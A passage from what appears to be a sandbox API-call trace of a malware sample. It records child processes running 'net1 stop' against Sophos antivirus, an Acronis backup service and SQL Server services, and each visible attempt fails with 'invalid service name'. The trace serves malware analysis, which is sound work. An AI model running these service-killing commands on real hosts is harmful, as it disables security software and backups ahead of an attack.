| out: lpBuffer="More help is available by typing NET HELPMSG 2185.\r\n") returned 0x34 [0125.822] GetFileType (hFile=0x0) returned 0x0 [0125.822] LocalAlloc (uFlags=0x0, uBytes=0x68) returned 0x3f61d8 [0125.822] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="More help is available by typing NET HELPMSG 2185.\r\n", cchWideChar=52, lpMultiByteStr=0x3f61d8, cbMultiByte=104, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="More help is available by typing NET HELPMSG 2185.\r\n\x04", lpUsedDefaultChar=0x0) returned 52 [0125.822] WriteFile (in: hFile=0x0, lpBuffer=0x3f61d8, nNumberOfBytesToWrite=0x34, lpNumberOfBytesWritten=0x33fcb8, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x33fcb8, lpOverlapped=0x0) returned 0 [0125.822] LocalFree (hMem=0x3f61d8) returned 0x0 [0125.822] GetFileType (hFile=0x0) returned 0x0 [0125.822] LocalAlloc (uFlags=0x0, uBytes=0x4) returned 0x3f61d8 [0125.822] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="\r\n", cchWideChar=2, lpMultiByteStr=0x3f61d8, cbMultiByte=4, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\r\n?", lpUsedDefaultChar=0x0) returned 2 [0125.822] WriteFile (in: hFile=0x0, lpBuffer=0x3f61d8, nNumberOfBytesToWrite=0x2, lpNumberOfBytesWritten=0x33fcb8, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x33fcb8, lpOverlapped=0x0) returned 0 [0125.822] LocalFree (hMem=0x3f61d8) returned 0x0 [0125.823] NetApiBufferFree (Buffer=0x3f1b20) returned 0x0 [0125.823] NetApiBufferFree (Buffer=0x3f1b38) returned 0x0 [0125.823] GetCommandLineW () returned="C:\\Windows\\system32\\net1 stop MSSQLFDLauncher$PROFXENGAGEMENT /y" [0125.823] exit (_Code=2) Process: id = "282" image_name = "net1.exe" filename = "c:\\windows\\syswow64\\net1.exe" page_root = "0x5a6f0000" os_pid = "0xcd4" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "167" os_parent_pid = "0x1170" cmd_line = "C:\\Windows\\system32\\net1 stop sophos /y" cur_dir = "C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Programs\\Temp\\" os_username = "XDUWTFONO\\5p5NrGJn0jS HALPmcxz" bitness = "32" os_groups = "XDUWTFONO\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000eb41" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Thread: id = 680 os_tid = 0xd54 [0125.576] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x1af8bc | out: lpSystemTimeAsFileTime=0x1af8bc*(dwLowDateTime=0x1e95a110, dwHighDateTime=0x1d6f0d1)) [0125.576] GetCurrentProcessId () returned 0xcd4 [0125.576] GetCurrentThreadId () returned 0xd54 [0125.576] GetTickCount () returned 0x1152a2d [0125.576] QueryPerformanceCounter (in: lpPerformanceCount=0x1af8b4 | out: lpPerformanceCount=0x1af8b4*=24467706319) returned 1 [0125.576] GetModuleHandleA (lpModuleName=0x0) returned 0xe40000 [0125.576] __set_app_type (_Type=0x1) [0125.577] __p__fmode () returned 0x770331f4 [0125.577] __p__commode () returned 0x770331fc [0125.824] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0xe4ffe6) returned 0x0 [0125.824] __getmainargs (in: _Argc=0xe59064, _Argv=0xe5906c, _Env=0xe59068, _DoWildCard=0, _StartInfo=0xe59024 | out: _Argc=0xe59064, _Argv=0xe5906c, _Env=0xe59068) returned 0 [0125.824] HeapSetInformation (HeapHandle=0x0, HeapInformationClass=0x1, HeapInformation=0x0, HeapInformationLength=0x0) returned 1 [0125.824] GetConsoleOutputCP () returned 0x1b5 [0125.824] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0xe59080 | out: lpCPInfo=0xe59080) returned 1 [0125.825] SetThreadUILanguage (LangId=0x0) returned 0x409 [0125.828] sprintf_s (in: _DstBuf=0x1af874, _DstSize=0xc, _Format=".%u" | out: _DstBuf=".437") returned 4 [0125.828] setlocale (category=0, locale=".437") returned="English_United States.437" [0125.830] GetStdHandle (nStdHandle=0xfffffff5) returned 0x3e0 [0125.830] GetStdHandle (nStdHandle=0xfffffff4) returned 0x0 [0125.830] GetCommandLineW () returned="C:\\Windows\\system32\\net1 stop sophos /y" [0125.830] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x1af640, nSize=0x104 | out: lpFilename="C:\\Windows\\SysWOW64\\net1.exe" (normalized: "c:\\windows\\syswow64\\net1.exe")) returned 0x1c [0125.830] RtlAllocateHeap (HeapHandle=0x4d0000, Flags=0x0, Size=0x60) returned 0x4e3ac8 [0125.830] _wcsnicmp (_String1="/Y", _String2="/y", _MaxCount=0x2) returned 0 [0125.837] NetApiBufferAllocate (in: ByteCount=0x10, Buffer=0x1af844 | out: Buffer=0x1af844*=0x4e1ad0) returned 0x0 [0125.837] NetApiBufferAllocate (in: ByteCount=0x10, Buffer=0x1af844 | out: Buffer=0x1af844*=0x4e1ae8) returned 0x0 [0125.837] _fileno (_File=0x77032900) returned -2 [0125.837] _setmode (_FileHandle=-2, _Mode=16384) returned -1 [0125.837] _wcsicmp (_String1="accounts", _String2="stop") returned -18 [0125.837] _wcsicmp (_String1="computer", _String2="stop") returned -16 [0125.837] _wcsicmp (_String1="config", _String2="stop") returned -16 [0125.837] _wcsicmp (_String1="continue", _String2="stop") returned -16 [0125.837] _wcsicmp (_String1="cont", _String2="stop") returned -16 [0125.837] _wcsicmp (_String1="file", _String2="stop") returned -13 [0125.837] _wcsicmp (_String1="files", _String2="stop") returned -13 [0125.837] _wcsicmp (_String1="group", _String2="stop") returned -12 [0125.837] _wcsicmp (_String1="groups", _String2="stop") returned -12 [0125.837] _wcsicmp (_String1="help", _String2="stop") returned -11 [0125.837] _wcsicmp (_String1="helpmsg", _String2="stop") returned -11 [0125.837] _wcsicmp (_String1="localgroup", _String2="stop") returned -7 [0125.837] _wcsicmp (_String1="pause", _String2="stop") returned -3 [0125.837] _wcsicmp (_String1="session", _String2="stop") returned -15 [0125.837] _wcsicmp (_String1="sessions", _String2="stop") returned -15 [0125.838] _wcsicmp (_String1="sess", _String2="stop") returned -15 [0125.838] _wcsicmp (_String1="share", _String2="stop") returned -12 [0125.838] _wcsicmp (_String1="start", _String2="stop") returned -14 [0125.838] _wcsicmp (_String1="stats", _String2="stop") returned -14 [0125.838] _wcsicmp (_String1="statistics", _String2="stop") returned -14 [0125.838] _wcsicmp (_String1="stop", _String2="stop") returned 0 [0125.838] _wcsicmp (_String1="accounts", _String2="sophos") returned -18 [0125.838] _wcsicmp (_String1="computer", _String2="sophos") returned -16 [0125.838] _wcsicmp (_String1="config", _String2="sophos") returned -16 [0125.838] _wcsicmp (_String1="continue", _String2="sophos") returned -16 [0125.838] _wcsicmp (_String1="cont", _String2="sophos") returned -16 [0125.838] _wcsicmp (_String1="file", _String2="sophos") returned -13 [0125.838] _wcsicmp (_String1="files", _String2="sophos") returned -13 [0125.838] _wcsicmp (_String1="group", _String2="sophos") returned -12 [0125.838] _wcsicmp (_String1="groups", _String2="sophos") returned -12 [0125.838] _wcsicmp (_String1="help", _String2="sophos") returned -11 [0125.838] _wcsicmp (_String1="helpmsg", _String2="sophos") returned -11 [0125.838] _wcsicmp (_String1="localgroup", _String2="sophos") returned -7 [0125.838] _wcsicmp (_String1="pause", _String2="sophos") returned -3 [0125.838] _wcsicmp (_String1="session", _String2="sophos") returned -10 [0125.838] _wcsicmp (_String1="sessions", _String2="sophos") returned -10 [0125.838] _wcsicmp (_String1="sess", _String2="sophos") returned -10 [0125.838] _wcsicmp (_String1="share", _String2="sophos") returned -7 [0125.838] _wcsicmp (_String1="start", _String2="sophos") returned 5 [0125.838] _wcsicmp (_String1="stats", _String2="sophos") returned 5 [0125.838] _wcsicmp (_String1="statistics", _String2="sophos") returned 5 [0125.838] _wcsicmp (_String1="stop", _String2="sophos") returned 5 [0125.838] _wcsicmp (_String1="time", _String2="sophos") returned 1 [0125.838] _wcsicmp (_String1="user", _String2="sophos") returned 2 [0125.838] _wcsicmp (_String1="users", _String2="sophos") returned 2 [0125.838] _wcsicmp (_String1="msg", _String2="sophos") returned -6 [0125.838] _wcsicmp (_String1="messenger", _String2="sophos") returned -6 [0125.838] _wcsicmp (_String1="receiver", _String2="sophos") returned -1 [0125.838] _wcsicmp (_String1="rcv", _String2="sophos") returned -1 [0125.838] _wcsicmp (_String1="netpopup", _String2="sophos") returned -5 [0125.838] _wcsicmp (_String1="redirector", _String2="sophos") returned -1 [0125.839] _wcsicmp (_String1="redir", _String2="sophos") returned -1 [0125.839] _wcsicmp (_String1="rdr", _String2="sophos") returned -1 [0125.839] _wcsicmp (_String1="workstation", _String2="sophos") returned 4 [0125.839] _wcsicmp (_String1="work", _String2="sophos") returned 4 [0125.839] _wcsicmp (_String1="wksta", _String2="sophos") returned 4 [0125.839] _wcsicmp (_String1="prdr", _String2="sophos") returned -3 [0125.839] _wcsicmp (_String1="devrdr", _String2="sophos") returned -15 [0125.839] _wcsicmp (_String1="lanmanworkstation", _String2="sophos") returned -7 [0125.839] _wcsicmp (_String1="server", _String2="sophos") returned -10 [0125.839] _wcsicmp (_String1="svr", _String2="sophos") returned 7 [0125.839] _wcsicmp (_String1="srv", _String2="sophos") returned 3 [0125.839] _wcsicmp (_String1="lanmanserver", _String2="sophos") returned -7 [0125.839] _wcsicmp (_String1="alerter", _String2="sophos") returned -18 [0125.839] _wcsicmp (_String1="netlogon", _String2="sophos") returned -5 [0125.839] _wcsupr (in: _String="sophos" | out: _String="SOPHOS") returned="SOPHOS" [0125.839] OpenSCManagerW (lpMachineName=0x0, lpDatabaseName=0x0, dwDesiredAccess=0x80000000) returned 0x4e5488 [0125.843] GetServiceKeyNameW (in: hSCManager=0x4e5488, lpDisplayName="SOPHOS", lpServiceName=0xe5aaf0, lpcchBuffer=0x1af7e0 | out: lpServiceName="", lpcchBuffer=0x1af7e0) returned 0 [0125.844] _wcsicmp (_String1="msg", _String2="SOPHOS") returned -6 [0125.844] _wcsicmp (_String1="messenger", _String2="SOPHOS") returned -6 [0125.844] _wcsicmp (_String1="receiver", _String2="SOPHOS") returned -1 [0125.844] _wcsicmp (_String1="rcv", _String2="SOPHOS") returned -1 [0125.844] _wcsicmp (_String1="redirector", _String2="SOPHOS") returned -1 [0125.844] _wcsicmp (_String1="redir", _String2="SOPHOS") returned -1 [0125.844] _wcsicmp (_String1="rdr", _String2="SOPHOS") returned -1 [0125.844] _wcsicmp (_String1="workstation", _String2="SOPHOS") returned 4 [0125.844] _wcsicmp (_String1="work", _String2="SOPHOS") returned 4 [0125.844] _wcsicmp (_String1="wksta", _String2="SOPHOS") returned 4 [0125.844] _wcsicmp (_String1="prdr", _String2="SOPHOS") returned -3 [0125.844] _wcsicmp (_String1="devrdr", _String2="SOPHOS") returned -15 [0125.844] _wcsicmp (_String1="lanmanworkstation", _String2="SOPHOS") returned -7 [0125.844] _wcsicmp (_String1="server", _String2="SOPHOS") returned -10 [0125.844] _wcsicmp (_String1="svr", _String2="SOPHOS") returned 7 [0125.844] _wcsicmp (_String1="srv", _String2="SOPHOS") returned 3 [0125.844] _wcsicmp (_String1="lanmanserver", _String2="SOPHOS") returned -7 [0125.844] _wcsicmp (_String1="alerter", _String2="SOPHOS") returned -18 [0125.844] _wcsicmp (_String1="netlogon", _String2="SOPHOS") returned -5 [0125.844] NetServiceControl (in: servername=0x0, service="SOPHOS", opcode=0x0, arg=0x0, bufptr=0x1af7dc | out: bufptr=0x1af7dc) returned 0x889 [0125.845] wcscpy_s (in: _Destination=0xe5a4e8, _SizeInWords=0x104, _Source="NETMSG" | out: _Destination="NETMSG") returned 0x0 [0125.846] LoadLibraryW (lpLibFileName="NETMSG") returned 0x74420000 [0125.846] FormatMessageW (in: dwFlags=0x2a00, lpSource=0x74420000, dwMessageId=0x889, dwLanguageId=0x0, lpBuffer=0xe5b338, nSize=0x800, Arguments=0xe59dd8 | out: lpBuffer="The service name is invalid.\r\n") returned 0x1e [0125.847] GetFileType (hFile=0x0) returned 0x0 [0125.847] LocalAlloc (uFlags=0x0, uBytes=0x3c) returned 0x4e3ea8 [0125.847] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="The service name is invalid.\r\n", cchWideChar=30, lpMultiByteStr=0x4e3ea8, cbMultiByte=60, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="The service name is invalid.\r\n", lpUsedDefaultChar=0x0) returned 30 [0125.847] WriteFile (in: hFile=0x0, lpBuffer=0x4e3ea8, nNumberOfBytesToWrite=0x1e, lpNumberOfBytesWritten=0x1af71c, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x1af71c, lpOverlapped=0x0) returned 0 [0125.847] LocalFree (hMem=0x4e3ea8) returned 0x0 [0125.847] GetFileType (hFile=0x0) returned 0x0 [0125.848] LocalAlloc (uFlags=0x0, uBytes=0x4) returned 0x4e6150 [0125.848] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="\r\n", cchWideChar=2, lpMultiByteStr=0x4e6150, cbMultiByte=4, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\r\nN", lpUsedDefaultChar=0x0) returned 2 [0125.848] WriteFile (in: hFile=0x0, lpBuffer=0x4e6150, nNumberOfBytesToWrite=0x2, lpNumberOfBytesWritten=0x1af71c, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x1af71c, lpOverlapped=0x0) returned 0 [0125.848] LocalFree (hMem=0x4e6150) returned 0x0 [0125.848] _ultow (in: _Dest=0x889, _Radix=1767244 | out: _Dest=0x889) returned="2185" [0125.848] FormatMessageW (in: dwFlags=0x2800, lpSource=0x74420000, dwMessageId=0xdba, dwLanguageId=0x0, lpBuffer=0xe5b338, nSize=0x800, Arguments=0xe59dd8 | out: lpBuffer="More help is available by typing NET HELPMSG 2185.\r\n") returned 0x34 [0125.848] GetFileType (hFile=0x0) returned 0x0 [0125.848] LocalAlloc (uFlags=0x0, uBytes=0x68) returned 0x4e6150 [0125.848] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="More help is available by typing NET HELPMSG 2185.\r\n", cchWideChar=52, lpMultiByteStr=0x4e6150, cbMultiByte=104, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="More help is available by typing NET HELPMSG 2185.\r\n\x04", lpUsedDefaultChar=0x0) returned 52 [0125.848] WriteFile (in: hFile=0x0, lpBuffer=0x4e6150, nNumberOfBytesToWrite=0x34, lpNumberOfBytesWritten=0x1af728, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x1af728, lpOverlapped=0x0) returned 0 [0125.848] LocalFree (hMem=0x4e6150) returned 0x0 [0125.848] GetFileType (hFile=0x0) returned 0x0 [0125.848] LocalAlloc (uFlags=0x0, uBytes=0x4) returned 0x4e6150 [0125.848] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="\r\n", cchWideChar=2, lpMultiByteStr=0x4e6150, cbMultiByte=4, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\r\nN", lpUsedDefaultChar=0x0) returned 2 [0125.848] WriteFile (in: hFile=0x0, lpBuffer=0x4e6150, nNumberOfBytesToWrite=0x2, lpNumberOfBytesWritten=0x1af728, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x1af728, lpOverlapped=0x0) returned 0 [0125.848] LocalFree (hMem=0x4e6150) returned 0x0 [0125.849] NetApiBufferFree (Buffer=0x4e1ad0) returned 0x0 [0125.849] NetApiBufferFree (Buffer=0x4e1ae8) returned 0x0 [0125.849] GetCommandLineW () returned="C:\\Windows\\system32\\net1 stop sophos /y" [0125.849] exit (_Code=2) Process: id = "283" image_name = "net1.exe" filename = "c:\\windows\\syswow64\\net1.exe" page_root = "0x5a974000" os_pid = "0xecc" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "111" os_parent_pid = "0x6d8" cmd_line = "C:\\Windows\\system32\\net1 stop AcrSch2Svc /y" cur_dir = "C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Programs\\Temp\\" os_username = "XDUWTFONO\\5p5NrGJn0jS HALPmcxz" bitness = "32" os_groups = "XDUWTFONO\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000eb41" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Thread: id = 681 os_tid = 0x1378 [0125.599] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x16feb4 | out: lpSystemTimeAsFileTime=0x16feb4*(dwLowDateTime=0x1e9a63d0, dwHighDateTime=0x1d6f0d1)) [0125.599] GetCurrentProcessId () returned 0xecc [0125.599] GetCurrentThreadId () returned 0x1378 [0125.599] GetTickCount () returned 0x1152a4c [0125.599] QueryPerformanceCounter (in: lpPerformanceCount=0x16feac | out: lpPerformanceCount=0x16feac*=24470033535) returned 1 [0125.600] GetModuleHandleA (lpModuleName=0x0) returned 0xe40000 [0125.600] __set_app_type (_Type=0x1) [0125.600] __p__fmode () returned 0x770331f4 [0125.600] __p__commode () returned 0x770331fc [0125.600] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0xe4ffe6) returned 0x0 [0125.600] __getmainargs (in: _Argc=0xe59064, _Argv=0xe5906c, _Env=0xe59068, _DoWildCard=0, _StartInfo=0xe59024 | out: _Argc=0xe59064, _Argv=0xe5906c, _Env=0xe59068) returned 0 [0125.600] HeapSetInformation (HeapHandle=0x0, HeapInformationClass=0x1, HeapInformation=0x0, HeapInformationLength=0x0) returned 1 [0125.600] GetConsoleOutputCP () returned 0x1b5 [0125.601] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0xe59080 | out: lpCPInfo=0xe59080) returned 1 [0125.601] SetThreadUILanguage (LangId=0x0) returned 0x409 [0125.604] sprintf_s (in: _DstBuf=0x16fe6c, _DstSize=0xc, _Format=".%u" | out: _DstBuf=".437") returned 4 [0125.604] setlocale (category=0, locale=".437") returned="English_United States.437" [0125.606] GetStdHandle (nStdHandle=0xfffffff5) returned 0x470 [0125.606] GetStdHandle (nStdHandle=0xfffffff4) returned 0x0 [0125.606] GetCommandLineW () returned="C:\\Windows\\system32\\net1 stop AcrSch2Svc /y" [0125.606] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x16fc38, nSize=0x104 | out: lpFilename="C:\\Windows\\SysWOW64\\net1.exe" (normalized: "c:\\windows\\syswow64\\net1.exe")) returned 0x1c [0125.606] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x68) returned 0x5c3ad8 [0125.606] _wcsnicmp (_String1="/Y", _String2="/y", _MaxCount=0x2) returned 0 [0125.606] NetApiBufferAllocate (in: ByteCount=0x10, Buffer=0x16fe3c | out: Buffer=0x16fe3c*=0x5c1ae0) returned 0x0 [0125.606] NetApiBufferAllocate (in: ByteCount=0x10, Buffer=0x16fe3c | out: Buffer=0x16fe3c*=0x5c1af8) returned 0x0 [0125.606] _fileno (_File=0x77032900) returned -2 [0125.606] _setmode (_FileHandle=-2, _Mode=16384) returned -1 [0125.606] _wcsicmp (_String1="accounts", _String2="stop") returned -18 [0125.606] _wcsicmp (_String1="computer", _String2="stop") returned -16 [0125.606] _wcsicmp (_String1="config", _String2="stop") returned -16 [0125.606] _wcsicmp (_String1="continue", _String2="stop") returned -16 [0125.606] _wcsicmp (_String1="cont", _String2="stop") returned -16 [0125.606] _wcsicmp (_String1="file", _String2="stop") returned -13 [0125.607] _wcsicmp (_String1="files", _String2="stop") returned -13 [0125.607] _wcsicmp (_String1="group", _String2="stop") returned -12 [0125.607] _wcsicmp (_String1="groups", _String2="stop") returned -12 [0125.607] _wcsicmp (_String1="help", _String2="stop") returned -11 [0125.607] _wcsicmp (_String1="helpmsg", _String2="stop") returned -11 [0125.607] _wcsicmp (_String1="localgroup", _String2="stop") returned -7 [0125.607] _wcsicmp (_String1="pause", _String2="stop") returned -3 [0125.607] _wcsicmp (_String1="session", _String2="stop") returned -15 [0125.607] _wcsicmp (_String1="sessions", _String2="stop") returned -15 [0125.607] _wcsicmp (_String1="sess", _String2="stop") returned -15 [0125.607] _wcsicmp (_String1="share", _String2="stop") returned -12 [0125.607] _wcsicmp (_String1="start", _String2="stop") returned -14 [0125.607] _wcsicmp (_String1="stats", _String2="stop") returned -14 [0125.607] _wcsicmp (_String1="statistics", _String2="stop") returned -14 [0125.607] _wcsicmp (_String1="stop", _String2="stop") returned 0 [0125.607] _wcsicmp (_String1="accounts", _String2="AcrSch2Svc") returned -15 [0125.607] _wcsicmp (_String1="computer", _String2="AcrSch2Svc") returned 2 [0125.607] _wcsicmp (_String1="config", _String2="AcrSch2Svc") returned 2 [0125.607] _wcsicmp (_String1="continue", _String2="AcrSch2Svc") returned 2 [0125.607] _wcsicmp (_String1="cont", _String2="AcrSch2Svc") returned 2 [0125.607] _wcsicmp (_String1="file", _String2="AcrSch2Svc") returned 5 [0125.607] _wcsicmp (_String1="files", _String2="AcrSch2Svc") returned 5 [0125.607] _wcsicmp (_String1="group", _String2="AcrSch2Svc") returned 6 [0125.607] _wcsicmp (_String1="groups", _String2="AcrSch2Svc") returned 6 [0125.607] _wcsicmp (_String1="help", _String2="AcrSch2Svc") returned 7 [0125.607] _wcsicmp (_String1="helpmsg", _String2="AcrSch2Svc") returned 7 [0125.607] _wcsicmp (_String1="localgroup", _String2="AcrSch2Svc") returned 11 [0125.607] _wcsicmp (_String1="pause", _String2="AcrSch2Svc") returned 15 [0125.607] _wcsicmp (_String1="session", _String2="AcrSch2Svc") returned 18 [0125.607] _wcsicmp (_String1="sessions", _String2="AcrSch2Svc") returned 18 [0125.607] _wcsicmp (_String1="sess", _String2="AcrSch2Svc") returned 18 [0125.607] _wcsicmp (_String1="share", _String2="AcrSch2Svc") returned 18 [0125.607] _wcsicmp (_String1="start", _String2="AcrSch2Svc") returned 18 [0125.607] _wcsicmp (_String1="stats", _String2="AcrSch2Svc") returned 18 [0125.607] _wcsicmp (_String1="statistics", _String2="AcrSch2Svc") returned 18 [0125.607] _wcsicmp (_String1="stop", _String2="AcrSch2Svc") returned 18 [0125.608] _wcsicmp (_String1="time", _String2="AcrSch2Svc") returned 19 [0125.608] _wcsicmp (_String1="user", _String2="AcrSch2Svc") returned 20 [0125.608] _wcsicmp (_String1="users", _String2="AcrSch2Svc") returned 20 [0125.608] _wcsicmp (_String1="msg", _String2="AcrSch2Svc") returned 12 [0125.608] _wcsicmp (_String1="messenger", _String2="AcrSch2Svc") returned 12 [0125.608] _wcsicmp (_String1="receiver", _String2="AcrSch2Svc") returned 17 [0125.608] _wcsicmp (_String1="rcv", _String2="AcrSch2Svc") returned 17 [0125.608] _wcsicmp (_String1="netpopup", _String2="AcrSch2Svc") returned 13 [0125.608] _wcsicmp (_String1="redirector", _String2="AcrSch2Svc") returned 17 [0125.608] _wcsicmp (_String1="redir", _String2="AcrSch2Svc") returned 17 [0125.608] _wcsicmp (_String1="rdr", _String2="AcrSch2Svc") returned 17 [0125.608] _wcsicmp (_String1="workstation", _String2="AcrSch2Svc") returned 22 [0125.608] _wcsicmp (_String1="work", _String2="AcrSch2Svc") returned 22 [0125.608] _wcsicmp (_String1="wksta", _String2="AcrSch2Svc") returned 22 [0125.608] _wcsicmp (_String1="prdr", _String2="AcrSch2Svc") returned 15 [0125.608] _wcsicmp (_String1="devrdr", _String2="AcrSch2Svc") returned 3 [0125.608] _wcsicmp (_String1="lanmanworkstation", _String2="AcrSch2Svc") returned 11 [0125.608] _wcsicmp (_String1="server", _String2="AcrSch2Svc") returned 18 [0125.608] _wcsicmp (_String1="svr", _String2="AcrSch2Svc") returned 18 [0125.608] _wcsicmp (_String1="srv", _String2="AcrSch2Svc") returned 18 [0125.608] _wcsicmp (_String1="lanmanserver", _String2="AcrSch2Svc") returned 11 [0125.608] _wcsicmp (_String1="alerter", _String2="AcrSch2Svc") returned 9 [0125.608] _wcsicmp (_String1="netlogon", _String2="AcrSch2Svc") returned 13 [0125.608] _wcsupr (in: _String="AcrSch2Svc" | out: _String="ACRSCH2SVC") returned="ACRSCH2SVC" [0125.608] OpenSCManagerW (lpMachineName=0x0, lpDatabaseName=0x0, dwDesiredAccess=0x80000000) returned 0x5c54a8 [0125.850] GetServiceKeyNameW (in: hSCManager=0x5c54a8, lpDisplayName="ACRSCH2SVC", lpServiceName=0xe5aaf0, lpcchBuffer=0x16fdd8 | out: lpServiceName="", lpcchBuffer=0x16fdd8) returned 0 [0125.851] _wcsicmp (_String1="msg", _String2="ACRSCH2SVC") returned 12 [0125.851] _wcsicmp (_String1="messenger", _String2="ACRSCH2SVC") returned 12 [0125.851] _wcsicmp (_String1="receiver", _String2="ACRSCH2SVC") returned 17 [0125.851] _wcsicmp (_String1="rcv", _String2="ACRSCH2SVC") returned 17 [0125.851] _wcsicmp (_String1="redirector", _String2="ACRSCH2SVC") returned 17 [0125.851] _wcsicmp (_String1="redir", _String2="ACRSCH2SVC") returned 17 [0125.851] _wcsicmp (_String1="rdr", _String2="ACRSCH2SVC") returned 17 [0125.851] _wcsicmp (_String1="workstation", _String2="ACRSCH2SVC") returned 22 [0125.851] _wcsicmp (_String1="work", _String2="ACRSCH2SVC") returned 22 [0125.851] _wcsicmp (_String1="wksta", _String2="ACRSCH2SVC") returned 22 [0125.851] _wcsicmp (_String1="prdr", _String2="ACRSCH2SVC") returned 15 [0125.851] _wcsicmp (_String1="devrdr", _String2="ACRSCH2SVC") returned 3 [0125.852] _wcsicmp (_String1="lanmanworkstation", _String2="ACRSCH2SVC") returned 11 [0125.852] _wcsicmp (_String1="server", _String2="ACRSCH2SVC") returned 18 [0125.852] _wcsicmp (_String1="svr", _String2="ACRSCH2SVC") returned 18 [0125.852] _wcsicmp (_String1="srv", _String2="ACRSCH2SVC") returned 18 [0125.852] _wcsicmp (_String1="lanmanserver", _String2="ACRSCH2SVC") returned 11 [0125.852] _wcsicmp (_String1="alerter", _String2="ACRSCH2SVC") returned 9 [0125.852] _wcsicmp (_String1="netlogon", _String2="ACRSCH2SVC") returned 13 [0125.852] NetServiceControl (in: servername=0x0, service="ACRSCH2SVC", opcode=0x0, arg=0x0, bufptr=0x16fdd4 | out: bufptr=0x16fdd4) returned 0x889 [0125.853] wcscpy_s (in: _Destination=0xe5a4e8, _SizeInWords=0x104, _Source="NETMSG" | out: _Destination="NETMSG") returned 0x0 [0125.853] LoadLibraryW (lpLibFileName="NETMSG") returned 0x74420000 [0125.854] FormatMessageW (in: dwFlags=0x2a00, lpSource=0x74420000, dwMessageId=0x889, dwLanguageId=0x0, lpBuffer=0xe5b338, nSize=0x800, Arguments=0xe59dd8 | out: lpBuffer="The service name is invalid.\r\n") returned 0x1e [0125.855] GetFileType (hFile=0x0) returned 0x0 [0125.855] LocalAlloc (uFlags=0x0, uBytes=0x3c) returned 0x5c3ec0 [0125.855] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="The service name is invalid.\r\n", cchWideChar=30, lpMultiByteStr=0x5c3ec0, cbMultiByte=60, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="The service name is invalid.\r\n", lpUsedDefaultChar=0x0) returned 30 [0125.855] WriteFile (in: hFile=0x0, lpBuffer=0x5c3ec0, nNumberOfBytesToWrite=0x1e, lpNumberOfBytesWritten=0x16fd14, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x16fd14, lpOverlapped=0x0) returned 0 [0125.855] LocalFree (hMem=0x5c3ec0) returned 0x0 [0125.855] GetFileType (hFile=0x0) returned 0x0 [0125.855] LocalAlloc (uFlags=0x0, uBytes=0x4) returned 0x5c6170 [0125.855] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="\r\n", cchWideChar=2, lpMultiByteStr=0x5c6170, cbMultiByte=4, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\r\n\\", lpUsedDefaultChar=0x0) returned 2 [0125.855] WriteFile (in: hFile=0x0, lpBuffer=0x5c6170, nNumberOfBytesToWrite=0x2, lpNumberOfBytesWritten=0x16fd14, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x16fd14, lpOverlapped=0x0) returned 0 [0125.855] LocalFree (hMem=0x5c6170) returned 0x0 [0125.855] _ultow (in: _Dest=0x889, _Radix=1506628 | out: _Dest=0x889) returned="2185" [0125.855] FormatMessageW (in: dwFlags=0x2800, lpSource=0x74420000, dwMessageId=0xdba, dwLanguageId=0x0, lpBuffer=0xe5b338, nSize=0x800, Arguments=0xe59dd8 | out: lpBuffer="More help is available by typing NET HELPMSG 2185.\r\n") returned 0x34 [0125.856] GetFileType (hFile=0x0) returned 0x0 [0125.856] LocalAlloc (uFlags=0x0, 